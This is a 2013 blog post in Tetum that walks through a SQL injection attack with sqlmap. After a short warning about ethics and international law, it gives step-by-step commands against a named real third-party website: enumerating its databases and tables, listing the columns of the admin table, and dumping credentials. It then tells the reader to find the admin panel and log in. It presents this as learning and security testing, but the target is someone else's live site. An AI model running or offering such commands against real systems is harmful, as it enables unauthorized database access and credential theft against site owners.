Tuesday, March 19, 2013
Hack ho rasaun Seguransa
Molok ita atu hakat ba iha titulu refere,,,hau hakarak hato'o katak, Informasaun Teknologia, laos areia ida ne'ebe hodi buka naran ou atu bergengsi ria,,, "haktuir lian Indonesia" maibe areia ida ne'e presija ema ne'ebe expert duni iha areia ida ne'e duni, no ema ne'ebe professional,,, in termos dedikasaun, displina,,, etika,,, moral,,, no seluk-seluk tan,,,,
Fila fali ba prinsipu basicu umanu nian,,,, katak, nudar ema, bainhira foins estuda buat kiik, nia hakarak koko liu tan,,,, hau foti ezemplu diak ida mak, ema foin estuda karate, molok tama iha trainamento nia laran,,, hanesan manu mate ;), maibe depois de tama treinu karate, nia komesa book a'an,,, nia komesa buka problema,,, nia komesa buka ema hodi tuku malu,,, nia komesa bo'ok ema, haktuir lia bahasa dehan cari gara2. ezemplu ida ne'e par ho Informasaun Teknologia, espesifiku liu iha haking nian.
Hau kualia ida ne'e klaru katak, bainhira imi le'e prosesu tuirmai ne'e imi hakarak koko,,, no bainhira imi koko no susesu imi hakarak hakat fali ba koko iha website seluk. Doben maluk sira, Informasaun Teknologia iha termos, iha lei,,, nia lei laos Lei nacional, maibe IT nia lei Lei International,,,ita halai to'o iha ne'ebe mos, inteligen America, CIA (central intelligence agency) sei buka tuir, laos buka tuir deit maibe buka tuir no kaer hodi lori ba Tribunal International.
hau hanoin lian hameno badak ne'e to'o iha rohan ona, no ita bele hakat ba iha artiklu inti.
Refere ba iha imagem leten, hakat ba iha pasu tuir mai ne'e:
1. Loke terminal Backtrack no hakerek cd /pentest/database/sqlmap depois hanehan enter
2. buka vuneravel website. iha ezemplu ne'e hau ida iha liman ona. (http://www.ajstudio.com.pk/innerpage.php?id=4)
no hakerek: python sqlmap.py -u http://ajstudio.com.pk/innerpage.php?id=4 --dbs hanehan enter
informasaun barak mak mosu iha screen nia laran maibe ida ita presija mak skema base de dadus hanesan highlighed iha imagem:
[*] aj
[*] information_schema
3. Baseia ba informasaun ne'ebe ita iha ona, Agora hakerek command tuir mai iha terminal no hanehan enter.
python sqlmap.py -u http://www.ajstudio.com.pk/innerpage.php?id=4 -D aj -tables
nia resultadu hanesan imagem tuir mai ne'e
5. Agora basei ba informasaun ne'ebe ita hetan iha pontus 4, agora hakerek
python sqlmap.py -u http://ajstudio.com.pk/innerpage.php?id=4 -T admin --columns
nia resultadu hanesan imagem tuir mai ne'e.
hakerek C no hanehan enter hodi continua,
hakerek Y no hanehan enter hodi continua,
nia ultima resultadu mak hanesan imagem tuir mai ne'e:
9. baseia ba column table ne'ebe iha informasaun ne'ebe ita presija,,,depois hakerek hanesan kodiku tuir mai no hanehan enter:
python sqlmap.py -u http://ajstudio.com.pk/innerpage.php?id=4 -T admin -U test --dump
resultadu ultime mak hanesan imagem tuir mai ne'ee,
ho rasaun etika no moral mak ita kualia ohin iha leten nia password laos black list mais white list :)
agora ita iha ona informasaun kredencial kompletu iha ita nian liman, e agora buka panel admin nian hodi login.
Ne'e mak prosesu to'o iha rohan oinsa atu hack password.
prosesu ida ne'e prosesu aprendijajen,,, dala ruma mosu perguntas iha le'e nain nia kakutak,,,
aprendijajen saida mak hack ema nian website no hatudu pasu por pasu momos iha ne'e hodi tama ema nian base de dadus? nia responsta mak, hatutan saida mak hau hatene ba le'e nain sira, liu tan resposta badak ne'e, bainhira ita dezenvolve rasik website ema nian , ka kompanha nian ka,,, institusaun ruma,,, prosesu ne'emak ita uja hodi koko nivel seguransa website mak ita desenvolve ne'e to'o iha ne'ebe.
Tested by: JF
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment